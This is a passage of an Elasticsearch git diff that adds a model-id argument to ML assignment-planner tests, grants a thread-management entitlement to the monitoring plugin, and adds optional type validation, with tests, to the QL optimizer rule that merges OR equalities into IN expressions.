"m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 2, null, 0, 0); PreserveAllAllocations preserveAllAllocations = new PreserveAllAllocations(List.of(node), List.of(deployment)); AssignmentPlan plan = AssignmentPlan.builder(List.of(node), List.of(deployment)).build(); diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveOneAllocationTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveOneAllocationTests.java index bc95fb1e0339e..6f340900276ff 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveOneAllocationTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/PreserveOneAllocationTests.java @@ -26,8 +26,30 @@ public class PreserveOneAllocationTests extends ESTestCase { public void testGivenNoPreviousAssignments() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(440).getBytes(), 4); - Deployment deployment1 = new AssignmentPlan.Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - AssignmentPlan.Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 2, 4, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new AssignmentPlan.Deployment( + "m_1", + "m_1", + ByteSizeValue.ofMb(30).getBytes(), + 2, + 1, + Map.of(), + 0, + null, + 0, + 0 + ); + AssignmentPlan.Deployment deployment2 = new Deployment( + "m_2", + "m_2", + ByteSizeValue.ofMb(30).getBytes(), + 2, + 4, + Map.of(), + 0, + null, + 0, + 0 + ); PreserveOneAllocation preserveOneAllocation = new PreserveOneAllocation(List.of(node1, node2), List.of(deployment1, deployment2)); List nodesPreservingAllocations = preserveOneAllocation.nodesPreservingAllocations(); @@ -42,8 +64,9 @@ public void testGivenPreviousAssignments() { // old memory format Node node1 = new Node("n_1", ByteSizeValue.ofMb(640).getBytes(), 8); Node node2 = new Node("n_2", ByteSizeValue.ofMb(640).getBytes(), 8); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of("n_1", 1), 1, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 1, Map.of("n_1", 1), 1, null, 0, 0); Deployment deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 6, @@ -121,6 +144,7 @@ public void testGivenPreviousAssignments() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 8); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 8); Deployment deployment1 = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, @@ -132,6 +156,7 @@ public void testGivenPreviousAssignments() { ByteSizeValue.ofMb(10).getBytes() ); Deployment deployment2 = new Deployment( + "m_2", "m_2", ByteSizeValue.ofMb(50).getBytes(), 6, @@ -211,7 +236,7 @@ public void testGivenModelWithPreviousAssignments_AndPlanToMergeHasNoAssignments { // old memory format Node node = new Node("n_1", ByteSizeValue.ofMb(400).getBytes(), 4); - Deployment deployment = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 2, null, 0, 0); + Deployment deployment = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, 2, Map.of("n_1", 2), 2, null, 0, 0); PreserveOneAllocation preserveOneAllocation = new PreserveOneAllocation(List.of(node), List.of(deployment)); AssignmentPlan plan = AssignmentPlan.builder(List.of(node), List.of(deployment)).build(); @@ -227,6 +252,7 @@ public void testGivenModelWithPreviousAssignments_AndPlanToMergeHasNoAssignments // new memory format Node node = new Node("n_1", ByteSizeValue.ofMb(400).getBytes(), 4); Deployment deployment = new Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 2, diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlannerTests.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlannerTests.java index 7005ad959577b..ea23bfde0d848 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlannerTests.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/inference/assignment/planning/ZoneAwareAssignmentPlannerTests.java @@ -36,7 +36,7 @@ public class ZoneAwareAssignmentPlannerTests extends ESTestCase { public void testGivenOneModel_OneNode_OneZone_DoesNotFit() { Node node = new Node("n_1", 100, 1); - AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment("m_1", 100, 1, 2, Map.of(), 0, null, 0, 0); + AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment("m_1", "m_1", 100, 1, 2, Map.of(), 0, null, 0, 0); AssignmentPlan plan = new ZoneAwareAssignmentPlanner(Map.of(List.of(), List.of(node)), List.of(deployment)).computePlan(); @@ -46,6 +46,7 @@ public void testGivenOneModel_OneNode_OneZone_DoesNotFit() { public void testGivenOneModel_OneNode_OneZone_FullyFits() { Node node = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 2, @@ -65,6 +66,7 @@ public void testGivenOneModel_OneNode_OneZone_FullyFits() { public void testGivenOneModel_OneNode_OneZone_PartiallyFits() { Node node = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 5); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 3, @@ -87,6 +89,7 @@ public void testGivenOneModelWithSingleAllocation_OneNode_TwoZones() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(440).getBytes(), 4); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 1, @@ -115,6 +118,7 @@ public void testGivenOneModel_OneNodePerZone_TwoZones_FullyFits() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(440).getBytes(), 4); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 2, @@ -142,6 +146,7 @@ public void testGivenOneModel_OneLargeNodePerZone_TwoZones_FullyFits() { Node node1 = new Node("n_1", ByteSizeValue.ofGb(16).getBytes(), 8); Node node2 = new Node("n_2", ByteSizeValue.ofGb(16).getBytes(), 8); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 4, @@ -169,6 +174,7 @@ public void testGivenOneModel_OneNodePerZone_TwoZones_PartiallyFits() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(440).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(440).getBytes(), 4); AssignmentPlan.Deployment deployment = new AssignmentPlan.Deployment( + "m_1", "m_1", ByteSizeValue.ofMb(100).getBytes(), 3, @@ -200,9 +206,9 @@ public void testGivenThreeDeployments_TwoNodesPerZone_ThreeZones_FullyFit() { Node node4 = new Node("n_4", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node5 = new Node("n_5", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node6 = new Node("n_6", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 6, 2, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(30).getBytes(), 2, 3, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 6, 2, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(30).getBytes(), 2, 3, Map.of(), 0, null, 0, 0); Map, List> nodesByZone = Map.of( List.of("z_1"), @@ -248,8 +254,8 @@ public void testGivenTwoDeploymentsWithSingleAllocation_OneNode_ThreeZones() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node2 = new Node("n_2", ByteSizeValue.ofMb(1000).getBytes(), 4); Node node3 = new Node("n_3", ByteSizeValue.ofMb(1000).getBytes(), 4); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(30).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(30).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(30).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(30).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); AssignmentPlan plan = new ZoneAwareAssignmentPlanner( Map.of(List.of("z1"), List.of(node1), List.of("z2"), List.of(node2), List.of("z3"), List.of(node3)), @@ -282,6 +288,7 @@ public void testPreviousAssignmentsGetAtLeastAsManyAllocationsAfterAddingNewMode previousModelsPlusNew.add( new AssignmentPlan.Deployment( m.deploymentId(), + m.modelId(), m.memoryBytes(), m.allocations(), m.threadsPerAllocation(), @@ -303,9 +310,9 @@ public void testPreviousAssignmentsGetAtLeastAsManyAllocationsAfterAddingNewMode public void testGivenClusterResize_GivenOneZone_ShouldAllocateEachModelAtLeastOnce() { Node node1 = new Node("n_1", ByteSizeValue.ofMb(2580).getBytes(), 2); Node node2 = new Node("n_2", ByteSizeValue.ofMb(2580).getBytes(), 2); - Deployment deployment1 = new Deployment("m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); - Deployment deployment2 = new Deployment("m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); - Deployment deployment3 = new Deployment("m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); + Deployment deployment1 = new Deployment("m_1", "m_1", ByteSizeValue.ofMb(800).getBytes(), 2, 1, Map.of(), 0, null, 0, 0); + Deployment deployment2 = new Deployment("m_2", "m_2", ByteSizeValue.ofMb(800).getBytes(), 1, 1, Map.of(), 0, null, 0, 0); + Deployment deployment3 = new Deployment("m_3", "m_3", ByteSizeValue.ofMb(250).getBytes(), 4, 1, Map.of(), 0, null, 0, 0); // First only start m_1 AssignmentPlan assignmentPlan = new ZoneAwareAssignmentPlanner(Map.of(List.of(), List.of(node1, node2)), List.of(deployment1)) diff --git a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/support/BaseMlIntegTestCase.java b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/support/BaseMlIntegTestCase.java index 4473919130c83..ee966ec951826 100644 --- a/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/support/BaseMlIntegTestCase.java +++ b/x-pack/plugin/ml/src/test/java/org/elasticsearch/xpack/ml/support/BaseMlIntegTestCase.java @@ -169,9 +169,9 @@ protected Collection> getMockPlugins() { } @Before - public void ensureTemplatesArePresent() throws Exception { + public void ensureTemplatesArePresent() { if (cluster().size() > 0) { - awaitClusterState(logger, MachineLearning::criticalTemplatesInstalled); + awaitClusterState(MachineLearning::criticalTemplatesInstalled); } } diff --git a/x-pack/plugin/monitoring/src/main/plugin-metadata/entitlement-policy.yaml b/x-pack/plugin/monitoring/src/main/plugin-metadata/entitlement-policy.yaml index 27ff2988cdcbe..ba7219af73c42 100644 --- a/x-pack/plugin/monitoring/src/main/plugin-metadata/entitlement-policy.yaml +++ b/x-pack/plugin/monitoring/src/main/plugin-metadata/entitlement-policy.yaml @@ -1,5 +1,6 @@ ALL-UNNAMED: - set_https_connection_properties # potentially required by apache.httpcomponents + - manage_threads # For org.elasticsearch.client.snif.Sniffer # the original policy has java.net.SocketPermission "*", "accept,connect" # but a comment stating it was "needed for multiple server implementations used in tests" # TODO: this is likely not needed, but including here to be on the safe side until diff --git a/x-pack/plugin/monitoring/src/test/java/org/elasticsearch/xpack/monitoring/MultiNodesStatsTests.java b/x-pack/plugin/monitoring/src/test/java/org/elasticsearch/xpack/monitoring/MultiNodesStatsTests.java index 2d51303b1d939..c5bc29043114f 100644 --- a/x-pack/plugin/monitoring/src/test/java/org/elasticsearch/xpack/monitoring/MultiNodesStatsTests.java +++ b/x-pack/plugin/monitoring/src/test/java/org/elasticsearch/xpack/monitoring/MultiNodesStatsTests.java @@ -98,7 +98,7 @@ public void testMultipleNodes() throws Exception { }); } - private void waitForMonitoringIndices() throws Exception { + private void waitForMonitoringIndices() { final var indexNameExpressionResolver = internalCluster().getCurrentMasterNodeInstance(IndexNameExpressionResolver.class); final var indicesOptions = IndicesOptions.builder() .wildcardOptions(IndicesOptions.WildcardOptions.builder().allowEmptyExpressions(true)) diff --git a/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/expression/predicate/operator/comparison/In.java b/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/expression/predicate/operator/comparison/In.java index f12f8edb71795..0398288960dc1 100644 --- a/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/expression/predicate/operator/comparison/In.java +++ b/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/expression/predicate/operator/comparison/In.java @@ -177,6 +177,10 @@ protected TypeResolution resolveType() { return super.resolveType(); } + public TypeResolution validateInTypes() { + return resolveType(); + } + @Override public int hashCode() { return Objects.hash(value, list); diff --git a/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRules.java b/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRules.java index 7625cbf3a56e5..a5e1d3bdbe620 100644 --- a/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRules.java +++ b/x-pack/plugin/ql/src/main/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRules.java @@ -1203,8 +1203,8 @@ private static boolean notEqualsIsRemovableFromConjunction(NotEquals notEquals, * 2. a == 1 OR a IN (2) becomes a IN (1, 2) * 3. a IN (1) OR a IN (2) becomes a IN (1, 2) * - * This rule does NOT check for type compatibility as that phase has been - * already be verified in the analyzer. + * By default (see {@link #shouldValidateIn()}), this rule does NOT check for type compatibility as that phase has + * already been verified in the analyzer, but this behavior can be changed by subclasses. */ public static class CombineDisjunctionsToIn extends OptimizerExpressionRule { public CombineDisjunctionsToIn() { @@ -1214,18 +1214,24 @@ public CombineDisjunctionsToIn() { @Override protected Expression rule(Or or) { Expression e = or; - // look only at equals and In + // look only at Equals and In List exps = splitOr(e); Map> found = new LinkedHashMap<>(); + Map> originalOrs = new LinkedHashMap<>(); ZoneId zoneId = null; List ors = new LinkedList<>(); for (Expression exp : exps) { if (exp instanceof Equals eq) { - // consider only equals against foldables + // consider only Equals against foldables if (eq.right().foldable()) { found.computeIfAbsent(eq.left(), k -> new LinkedHashSet<>()).add(eq.right()); + if (shouldValidateIn()) { + // in case there is an optimized In being built and its validation fails, rebuild the original ORs + // so, keep around the original Expressions + originalOrs.computeIfAbsent(eq.left(), k -> new ArrayList<>()).add(eq); + } } else { ors.add(exp); } @@ -1234,6 +1240,11 @@ protected Expression rule(Or or) { } } else if (exp instanceof In in) { found.computeIfAbsent(in.value(), k -> new LinkedHashSet<>()).addAll(in.list()); + if (shouldValidateIn()) { + // in case there is an optimized In being built and its validation fails, rebuild the original ORs + // so, keep around the original Expressions + originalOrs.computeIfAbsent(in.value(), k -> new ArrayList<>()).add(in); + } if (zoneId == null) { zoneId = in.zoneId(); } @@ -1243,11 +1254,31 @@ protected Expression rule(Or or) { } if (found.isEmpty() == false) { - // combine equals alongside the existing ors + // combine Equals alongside the existing ORs final ZoneId finalZoneId = zoneId; - found.forEach( - (k, v) -> { ors.add(v.size() == 1 ? createEquals(k, v, finalZoneId) : createIn(k, new ArrayList<>(v), finalZoneId)); } - ); + found.forEach((k, v) -> { + if (v.size() == 1) { + ors.add(createEquals(k, v.iterator().next(), finalZoneId)); + } else { + In in = createIn(k, new ArrayList<>(v), finalZoneId); + // IN has its own particularities when it comes to type resolution and not all implementations + // double check the validity of an internally created IN (like the one created here). EQL is one where the IN + // implementation is like this mechanism here has been specifically created for it + if (shouldValidateIn()) { + Expression.TypeResolution resolution = in.validateInTypes(); + if (resolution.unresolved()) { + // if the internally created In is not valid, fall back to the original ORs + assert originalOrs.containsKey(k); + assert originalOrs.get(k).isEmpty() == false; + ors.add(combineOr(originalOrs.get(k))); + } else { + ors.add(in); + } + } else { + ors.add(in); + } + } + }); Expression combineOr = combineOr(ors); // check the result semantically since the result might different in order @@ -1261,13 +1292,17 @@ protected Expression rule(Or or) { return e; } - protected Equals createEquals(Expression k, Set v, ZoneId finalZoneId) { - return new Equals(k.source(), k, v.iterator().next(), finalZoneId); - } - protected In createIn(Expression key, List values, ZoneId zoneId) { return new In(key.source(), key, values, zoneId); } + + protected boolean shouldValidateIn() { + return false; + } + + private Equals createEquals(Expression key, Expression value, ZoneId finalZoneId) { + return new Equals(key.source(), key, value, finalZoneId); + } } public static class PushDownAndCombineFilters extends OptimizerRule { diff --git a/x-pack/plugin/ql/src/test/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRulesTests.java b/x-pack/plugin/ql/src/test/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRulesTests.java index bc7e0b2a93bf5..9e60a60c4c3d3 100644 --- a/x-pack/plugin/ql/src/test/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRulesTests.java +++ b/x-pack/plugin/ql/src/test/java/org/elasticsearch/xpack/ql/optimizer/OptimizerRulesTests.java @@ -66,6 +66,8 @@ import java.time.ZoneId; import java.util.Collections; import java.util.List; +import java.util.Set; +import java.util.function.Consumer; import static java.util.Arrays.asList; import static java.util.Collections.emptyList; @@ -105,6 +107,9 @@ public class OptimizerRulesTests extends ESTestCase { private static final Literal FOUR = L(4); private static final Literal FIVE = L(5); private static final Literal SIX = L(6); + private static final Literal TEXT_A = L("A"); + private static final Literal TEXT_B = L("B"); + private static final Literal TEXT_C = L("C"); public static class DummyBooleanExpression extends Expression { @@ -1491,48 +1496,71 @@ public void testExactMatchRLike() throws Exception { // // CombineDisjunction in Equals // + + // CombineDisjunctionsToIn with shouldValidateIn as true + private final class ValidateableCombineDisjunctionsToIn extends CombineDisjunctionsToIn { + @Override + protected boolean shouldValidateIn() { + return true; + } + }; + + private void assertCombineDisjunctionsToIn(Consumer tester) { + for (CombineDisjunctionsToIn rule : Set.of(new CombineDisjunctionsToIn(), new ValidateableCombineDisjunctionsToIn())) { + tester.accept(rule); + } + } + public void testTwoEqualsWithOr() throws Exception { FieldAttribute fa = getFieldAttribute(); Or or = new Or(EMPTY, equalsOf(fa, ONE), equalsOf(fa, TWO)); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(In.class, e.getClass()); - In in = (In) e; - assertEquals(fa, in.value()); - assertThat(in.list(), contains(ONE, TWO)); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(In.class, e.getClass()); + In in = (In) e; + assertEquals(fa, in.value()); + assertThat(in.list(), contains(ONE, TWO)); + }); } public void testTwoEqualsWithSameValue() throws Exception { FieldAttribute fa = getFieldAttribute(); Or or = new Or(EMPTY, equalsOf(fa, ONE), equalsOf(fa, ONE)); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(Equals.class, e.getClass()); - Equals eq = (Equals) e; - assertEquals(fa, eq.left()); - assertEquals(ONE, eq.right()); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(Equals.class, e.getClass()); + Equals eq = (Equals) e; + assertEquals(fa, eq.left()); + assertEquals(ONE, eq.right()); + }); } public void testOneEqualsOneIn() throws Exception { FieldAttribute fa = getFieldAttribute(); Or or = new Or(EMPTY, equalsOf(fa, ONE), new In(EMPTY, fa, singletonList(TWO))); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(In.class, e.getClass()); - In in = (In) e; - assertEquals(fa, in.value()); - assertThat(in.list(), contains(ONE, TWO)); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(In.class, e.getClass()); + In in = (In) e; + assertEquals(fa, in.value()); + assertThat(in.list(), contains(ONE, TWO)); + }); } public void testOneEqualsOneInWithSameValue() throws Exception { FieldAttribute fa = getFieldAttribute(); Or or = new Or(EMPTY, equalsOf(fa, ONE), new In(EMPTY, fa, asList(ONE, TWO))); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(In.class, e.getClass()); - In in = (In) e; - assertEquals(fa, in.value()); - assertThat(in.list(), contains(ONE, TWO)); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(In.class, e.getClass()); + In in = (In) e; + assertEquals(fa, in.value()); + assertThat(in.list(), contains(ONE, TWO)); + }); } public void testSingleValueInToEquals() throws Exception { @@ -1540,8 +1568,10 @@ public void testSingleValueInToEquals() throws Exception { Equals equals = equalsOf(fa, ONE); Or or = new Or(EMPTY, equals, new In(EMPTY, fa, singletonList(ONE))); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(equals, e); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(equals, e); + }); } public void testEqualsBehindAnd() throws Exception { @@ -1549,9 +1579,11 @@ public void testEqualsBehindAnd() throws Exception { And and = new And(EMPTY, equalsOf(fa, ONE), equalsOf(fa, TWO)); Filter dummy = new Filter(EMPTY, relation(), and); - LogicalPlan transformed = new CombineDisjunctionsToIn().apply(dummy); - assertSame(dummy, transformed); - assertEquals(and, ((Filter) transformed).condition()); + assertCombineDisjunctionsToIn((rule) -> { + LogicalPlan transformed = rule.apply(dummy); + assertSame(dummy, transformed); + assertEquals(and, ((Filter) transformed).condition()); + }); } public void testTwoEqualsDifferentFields() throws Exception { @@ -1559,8 +1591,10 @@ public void testTwoEqualsDifferentFields() throws Exception { FieldAttribute fieldTwo = TestUtils.getFieldAttribute("TWO"); Or or = new Or(EMPTY, equalsOf(fieldOne, ONE), equalsOf(fieldTwo, TWO)); - Expression e = new CombineDisjunctionsToIn().rule(or); - assertEquals(or, e); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(or); + assertEquals(or, e); + }); } public void testMultipleIn() throws Exception { @@ -1568,11 +1602,13 @@ public void testMultipleIn() throws Exception { Or firstOr = new Or(EMPTY, new In(EMPTY, fa, singletonList(ONE)), new In(EMPTY, fa, singletonList(TWO))); Or secondOr = new Or(EMPTY, firstOr, new In(EMPTY, fa, singletonList(THREE))); - Expression e = new CombineDisjunctionsToIn().rule(secondOr); - assertEquals(In.class, e.getClass()); - In in = (In) e; - assertEquals(fa, in.value()); - assertThat(in.list(), contains(ONE, TWO, THREE)); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(secondOr); + assertEquals(In.class, e.getClass()); + In in = (In) e; + assertEquals(fa, in.value()); + assertThat(in.list(), contains(ONE, TWO, THREE)); + }); } public void testOrWithNonCombinableExpressions() throws Exception { @@ -1580,14 +1616,159 @@ public void testOrWithNonCombinableExpressions() throws Exception { Or firstOr = new Or(EMPTY, new In(EMPTY, fa, singletonList(ONE)), lessThanOf(fa, TWO)); Or secondOr = new Or(EMPTY, firstOr, new In(EMPTY, fa, singletonList(THREE))); - Expression e = new CombineDisjunctionsToIn().rule(secondOr); + assertCombineDisjunctionsToIn((rule) -> { + Expression e = rule.rule(secondOr); + assertEquals(Or.class, e.getClass()); + Or or = (Or) e; + assertEquals(or.left(), firstOr.right()); + assertEquals(In.class, or.right().getClass()); + In in = (In) or.right(); + assertEquals(fa, in.value()); + assertThat(in.list(), contains(ONE, THREE)); + }); + } + + public void testDontCombineSimpleDifferentTypes() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or or = new Or(EMPTY, new Equals(EMPTY, fa, ONE), new Equals(EMPTY, fa, TEXT_A)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineDifferentTypes() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or or = new Or(EMPTY, new Equals(EMPTY, fa, ONE), new Equals(EMPTY, fa, TEXT_A)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + // See https://github.com/elastic/elasticsearch/issues/118621 + public void testDontCombineStringTypesForIPField() throws Exception { + FieldAttribute fa = TestUtils.getFieldAttribute("ip", DataTypes.IP); + + Or or = new Or(EMPTY, new Equals(EMPTY, fa, TEXT_A), new Equals(EMPTY, fa, TEXT_B)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineForIncompatibleFieldType() throws Exception { + FieldAttribute fa = TestUtils.getFieldAttribute("boolean", BOOLEAN); + + Or or = new Or(EMPTY, new Equals(EMPTY, fa, ONE), new Equals(EMPTY, fa, TWO)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineTwoCompatibleAndOneIncompatible() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or firstOr = new Or(EMPTY, new Equals(EMPTY, fa, ONE), new Equals(EMPTY, fa, TWO)); + Or secondOr = new Or(EMPTY, firstOr, new Equals(EMPTY, fa, TEXT_A)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(secondOr); + assertEquals(secondOr, e); + } + + public void testDontCombineOneIncompatibleEqualsWithCompatibleIn() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or or = new Or(EMPTY, new In(EMPTY, fa, List.of(ONE, TWO)), new Equals(EMPTY, fa, TEXT_A)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineTwoIncompatibleIns1() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or or = new Or(EMPTY, new In(EMPTY, fa, List.of(ONE, TWO)), new In(EMPTY, fa, List.of(TEXT_A, TEXT_B, TEXT_C))); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineTwoIncompatibleIns2() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or or = new Or(EMPTY, new In(EMPTY, fa, List.of(ONE)), new In(EMPTY, fa, List.of(TEXT_A))); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineTwoIncompatibleIns3() throws Exception { + FieldAttribute fa1 = TestUtils.getFieldAttribute("field1"); + FieldAttribute fa2 = TestUtils.getFieldAttribute("field2"); + + Or or = new Or(EMPTY, new In(EMPTY, fa1, List.of(ONE, TWO)), new In(EMPTY, fa2, List.of(THREE, FOUR))); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(or); + assertEquals(or, e); + } + + public void testDontCombineIncompatibleInWithTwoCompatibleEquals() throws Exception { + FieldAttribute fa = getFieldAttribute(); + + Or firstOr = new Or(EMPTY, new In(EMPTY, fa, List.of(TEXT_A, TEXT_B)), new Equals(EMPTY, fa, THREE)); + Or secondOr = new Or(EMPTY, firstOr, new Equals(EMPTY, fa, FOUR)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(secondOr); + assertEquals(secondOr, e); + } + + public void testCombineOnlyEqualsExpressions() throws Exception { + FieldAttribute faIn = TestUtils.getFieldAttribute("field_for_in"); + FieldAttribute faEquals = TestUtils.getFieldAttribute("field_for_equals"); + + Or firstOr = new Or(EMPTY, new In(EMPTY, faIn, List.of(ONE, TWO)), new Equals(EMPTY, faEquals, THREE)); + Or secondOr = new Or(EMPTY, firstOr, new Equals(EMPTY, faEquals, FOUR)); + Expression e = new ValidateableCombineDisjunctionsToIn().rule(secondOr); assertEquals(Or.class, e.getClass()); Or or = (Or) e; - assertEquals(or.left(), firstOr.right()); + assertEquals(or.left(), firstOr.left()); assertEquals(In.class, or.right().getClass()); In in = (In) or.right(); - assertEquals(fa, in.value()); - assertThat(in.list(), contains(ONE, THREE)); + assertEquals(faEquals, in.value()); + assertThat(in.list(), contains(THREE, FOUR)); + } + + public void testCombineOnlyCompatibleEqualsExpressions() throws Exception { + FieldAttribute faEquals1 = TestUtils.getFieldAttribute("field_for_equals1"); + FieldAttribute faEquals2 = TestUtils.getFieldAttribute("field_for_equals2"); + + Equals equalsA = new Equals(EMPTY, faEquals2, TEXT_A); + Equals equalsB = new Equals(EMPTY, faEquals2, TEXT_B); + Or firstOr = new Or(EMPTY, new Equals(EMPTY, faEquals1, ONE), equalsA); + Or secondOr = new Or(EMPTY, firstOr, new Equals(EMPTY, faEquals1, TWO)); + Or thirdOr = new Or(EMPTY, secondOr, equalsB); + + Expression e = new ValidateableCombineDisjunctionsToIn().rule(thirdOr); + assertEquals(Or.class, e.getClass()); + Or or = (Or) e; + assertEquals(In.class, or.left().getClass()); + In in = (In) or.left(); + assertThat(in.list(), contains(ONE, 